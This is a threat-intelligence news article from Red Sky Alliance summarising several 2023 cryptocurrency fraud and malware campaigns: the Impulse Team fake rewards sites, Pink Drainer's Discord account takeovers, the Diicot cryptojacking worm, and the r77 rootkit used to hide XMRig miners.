"There's a sucker born every minute" is a phrase closely associated with PT Barnum, an American showman of the mid-19th century, although there is no evidence that he said it. Early examples of its use are among gamblers and confidence tricksters of the era. A previously undetected cryptocurrency scam has leveraged over 1,000 fraudulent websites to ensnare users into a bogus rewards scheme since at least January 2021.
This massive campaign has likely resulted in thousands of people being scammed worldwide, reported by researchers recently, linking it to a Russian-speaking threat actor named "Impulse Team. The scam works via an advanced fee fraud that involves tricking victims into believing they have won a certain amount of cryptocurrency. However, to get their rewards, the victims must pay a small amount to open an account on their website.[1]
The compromise chain starts with a direct message propagated via Twitter to lure potential targets into visiting the decoy site. The account responsible for sending the messages has since been closed. The message urges recipients to sign up for an account on the website and apply a promo code specified in the message to win a cryptocurrency reward amounting to 0.78632 bitcoin (about $20,300). But once an account is set up on the fake platform, users are requested to activate it by making a minimal deposit worth 0.01 bitcoin (about $258) to confirm their identity and complete the withdrawal.
While relatively sizable, the amount necessary to activate the account pales compared to what users would get in return recipients never get anything when they pay the activation amount. A public Telegram channel that records every victim payment shows that the illicit transactions have yielded the actors a little over $5 million between 24 December 2022 and 08 March 2023.
Investigators reported that they found hundreds of domains related to this fraud, some active as far back as 2016. All the fake websites belong to an affiliate "scam crypto project" codenamed Impulse that's been advertised on Russian cybercrime forums since February 2021. Like Ransomware-as-a-Service (RaaS) operations, the venture requires affiliate actors to pay a fee to join the program and share a percentage of the earnings with the original authors. To lend the operation some degree of legitimacy, the threat actors are believed to have created a lookalike version of a known anti-scam tool known as ScamDoc, which assigns a trust score for different websites, in a plausible attempt to pass off the sketchy crypto services as trustworthy. Researchers documented private messages, online videos, and ads on other social networks, such as TikTok and Mastodon, indicating that the affiliates use various methods to advertise the fraudulent activity.
The threat actor streamlines operations for its affiliates by providing hosting and infrastructure so they can run these scam websites independently. Affiliates can then concentrate on other aspects of the operation, such as running their own advertising campaigns.
News of the fake giveaway scam coincides with a new wave of cryptocurrency stealing attacks orchestrated by a threat actor named Pink Drainer, that has been found to masquerade as a journalist to seize control of victims' Discord and Twitter accounts and promote spurious crypto schemes. According to statistics gathered by ScamSniffer, Pink Drainer has successfully compromised 2,307 accounts as of 11 June 2023 to steal more than $3.29 million worth of digital assets.
With this disguise, they lure unsuspecting victims into mock interviews. Ultimately, they ask for a KYC (know your customer) validation, leading the victims to deceptive websites harboring phishing scripts. These scripts are designed to pilfer Discord authentication tokens, allowing the perpetrators to take over the victims' Discord accounts without needing traditional credentials or two-factor authentication codes.
Analysts suspect that the hackers may adapt their strategy depending on their targets, “for example, by guiding Discord administrators to open a malicious Carl verification bot and add bookmarks containing malicious code,” ScamSniffer analysts explain. “After successfully obtaining permissions, hackers will also take a series of measures to make the entire attack process last longer.”
Threat actors take a series of extra steps to ensure their persistence on the compromised accounts, including removing other administrators, committing violations on the main account to attract a Discord ban, and giving administrator privileges to a rogue account. This aggressive crypto-draining campaign raises the stakes in the cybersecurity landscape, highlighting a glaring vulnerability in widely used communication platforms like Discord.
The findings also come weeks after Akamai took the wraps off a renewed Romanian cryptojacking campaign named Diicot (previously Mexals) that employs a Golang-based Secure Shell (SSH) worm module and a new LAN spreader for propagation.
Recently Elastic Security Labs detailed using an open-source rootkit called r77 to deploy the XMRig cryptocurrency miner in several Asian countries. The r77's primary purpose is to hide the presence of other software on a system by hooking important Windows APIs, making it an ideal tool for cybercriminals looking to carry out stealthy attacks.
By leveraging the r77 rootkit, the authors of the malicious crypto miner could evade detection and continue their campaign undetected. The r77 rootkit is also incorporated in SeroXen, a nascent variant of the Quasar remote administration tool that is sold for only US$30 for a monthly license or US$60 for a lifetime bundle.
This article is presented at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
[1] https://thehackernews.com/2023/06/beware-1000-fake-cryptocurrency-sites.html
Comments